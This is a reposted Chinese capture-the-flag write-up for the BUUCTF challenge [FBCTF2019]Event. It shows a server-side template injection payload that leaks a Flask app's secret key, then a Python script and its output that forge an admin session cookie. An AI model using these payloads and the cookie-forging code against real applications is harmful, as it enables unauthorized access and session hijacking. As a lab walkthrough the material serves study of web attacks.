BUUCTF:[FBCTF2019]Event
程序员文章站
2022-06-09 18:14:16
题目地址:https://buuoj.cn/challenges#[FBCTF2019]Event模版注入+Cookie伪造Cookie:Im1vY2h1Ig.XyDM5A.RIObE23_pwucPR7ZAVNsm_cOwpU加密方式未知,密钥未知在提交数据的时候,有三个可控参数,经测试在event_important参数存在模版注入,输入__dict__,发现成功回显接着查找配置文件:__class__.__init__.__globals__[app].config发现密钥,开始...
题目地址:https://buuoj.cn/challenges#[FBCTF2019]Event
模版注入+Cookie伪造
Cookie:Im1vY2h1Ig.XyDM5A.RIObE23_pwucPR7ZAVNsm_cOwpU
加密方式未知,密钥未知
在提交数据的时候,有三个可控参数,经测试在event_important
参数存在模版注入,输入__dict__
,发现成功回显
接着查找配置文件:__class__.__init__.__globals__[app].config
发现密钥,开始伪造Cookie
from flask import Flask
from flask.sessions import SecureCookieSessionInterface
app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'
session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)
@app.route('/')
def index():
print(session_serializer.dumps("admin"))
index()
PS C:\Users\Administrator\Desktop> python .\exp.py
ImFkbWluIg.XyDKIw.wlPGRJ52VIGmXV5buLQ9-h-wt8w
将生成的Cookie替换user
中的Cookie然后访问Admin panel
本文地址:https://blog.csdn.net/mochu7777777/article/details/107653920
上一篇: MySQL bin-log日志实验测试
推荐阅读
-
Python实现Event回调机制的方法
-
Python多线程同步Lock、RLock、Semaphore、Event实例
-
.Net WInform开发笔记(五)关于事件Event
-
Python多线程编程(八):使用Event实现线程间通信
-
jQuery.event兼容各浏览器的event详细解析
-
jquery中event对象属性与方法小结
-
C#采用mouse_event函数实现模拟鼠标功能
-
SharePoint 2007图文开发教程(5) 体验Event Handler
-
js中的触发事件对象event.srcElement与event.target详解
-
js中获取键盘按下键值event.keyCode、event.charCode和event.which的兼容性详解